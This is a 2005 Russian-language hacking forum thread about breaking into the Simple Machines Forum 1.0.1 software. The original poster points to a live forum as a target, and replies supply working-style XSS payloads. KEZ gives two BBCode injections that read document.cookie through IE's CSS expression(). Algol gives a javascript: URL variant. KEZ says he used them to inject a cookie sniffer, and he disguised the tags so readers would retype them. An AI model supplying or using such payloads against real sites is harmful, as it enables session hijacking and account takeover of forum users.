ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SMF 1.0.1. (Simple Machines Forum)
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

SMF 1.0.1. (Simple Machines Forum)
  #1  
Старый 02.04.2005, 18:59
Аватар для FST
FST
Новичок
Регистрация: 05.02.2005
Сообщений: 4
Провел на форуме:
0

Репутация: 0
Unhappy SMF 1.0.1. (Simple Machines Forum)
Ломаю голову уже какой день и никак дыру найти не могу Может кто-то уже сталкивался? Вот пример форума. Этот форум ломать не обязательно
 
Ответить с цитированием

  #2  
Старый 02.04.2005, 19:17
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Дай мне линк на исходники
 
Ответить с цитированием

  #3  
Старый 02.04.2005, 19:23
Аватар для fahrenheit
fahrenheit
Новичок
Регистрация: 20.03.2005
Сообщений: 12
Провел на форуме:
0

Репутация: 1
По умолчанию
 
Ответить с цитированием

  #4  
Старый 02.04.2005, 19:26
Аватар для fahrenheit
fahrenheit
Новичок
Регистрация: 20.03.2005
Сообщений: 12
Провел на форуме:
0

Репутация: 1
По умолчанию
Чего то и мне ломаку стало интересно поискать уязвимость )
Это же какое счатье потом если найдеш))
 
Ответить с цитированием

  #5  
Старый 02.04.2005, 19:55
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Мда... ну и форум.
В первыем минуты мне показалось что он сверх-защищеный. (по обилию тегов)

Через 2 минуты я уже выделил две самых простых XSS. Их хватит. Если нет - берите ещё. Я сделаю видео.

Код:
[urл=http://a[еmail=s=`]a[/еmail]]a[/urл]`xss=`alert(document.cookie);this.xss=null` 
style=top:expression(eval(this.xss));

[iмg]http://[urл=http://s=`]aaaaa[/urл][/iмg]`xss=`alert(document.cookie);this.xss=null` 
style=top:expression(eval(this.xss));
ВНИМАНИЕ! Чтобы НАШ ФОРУМ не парсил (не зависимо от тега [СODE]) мой код, я НАМЕРЕННО написал URL через Л. И емейл тоже так написал.
ПЕРЕПИШИТЕ САМИ!
 
Ответить с цитированием

  #6  
Старый 02.04.2005, 19:58
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Спаренные теги в правильном исполнении:
Код HTML:
[img]http://s.d[email]sa@sa/style=background:url(javascript:alert());[/img][/email]
 
Ответить с цитированием

  #7  
Старый 02.04.2005, 20:01
Аватар для Algol
Algol
Регистрация: 29.05.2002
Сообщений: 1,793
Провел на форуме:
2050916

Репутация: 0


По умолчанию
Цитата:
Через 2 минуты я уже выделил две самых простых XSS.
Кстати, ты зря везде пихаешь знак `.
Ведь он прокатывает только в IE.
Если можно обойтись без него, то лучше его не использовать.
Последний раз редактировалось KEZ; 02.04.2005 в 20:48.. Причина: quote неправильно написал
 
Ответить с цитированием

  #8  
Старый 02.04.2005, 20:47
Аватар для KEZ
KEZ
Guest
Сообщений: n/a
Провел на форуме:

Репутация:
По умолчанию
Ну... это как сказать.
У меня все правильно. И снифер вставляется. Я проверял.
Расчитано на то что Ie. Сейчас большинство его используют
Так что нельзя назвать мое исполнение неправильным
Последний раз редактировалось KEZ; 02.04.2005 в 20:50..
 
Ответить с цитированием

  #9  
Старый 02.04.2005, 22:59
Аватар для FST
FST
Новичок
Регистрация: 05.02.2005
Сообщений: 4
Провел на форуме:
0

Репутация: 0
По умолчанию
Цитата:
Сообщение от KEZ  
Мда... ну и форум.
В первыем минуты мне показалось что он сверх-защищеный. (по обилию тегов)

Через 2 минуты я уже выделил две самых простых XSS. Их хватит. Если нет - берите ещё. Я сделаю видео.

Код:
[urл=http://a[еmail=s=`]a[/еmail]]a[/urл]`xss=`alert(document.cookie);this.xss=null` 
style=top:expression(eval(this.xss));

[iмg]http://[urл=http://s=`]aaaaa[/urл][/iмg]`xss=`alert(document.cookie);this.xss=null` 
style=top:expression(eval(this.xss));
ВНИМАНИЕ! Чтобы НАШ ФОРУМ не парсил (не зависимо от тега [СODE]) мой код, я НАМЕРЕННО написал URL через Л. И емейл тоже так написал.
ПЕРЕПИШИТЕ САМИ!
Во, да ты дайшь басу Буду ждать ролик! Респект. Я день потратил и ничего не нашёл

Ссылочку на видео не забудь оставить
 
Ответить с цитированием

  #10  
Старый 06.04.2005, 15:17
Аватар для FST
FST
Новичок
Регистрация: 05.02.2005
Сообщений: 4
Провел на форуме:
0

Репутация: 0
Unhappy
Гррр, что-то я видео ролика обещенного не вижу !
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ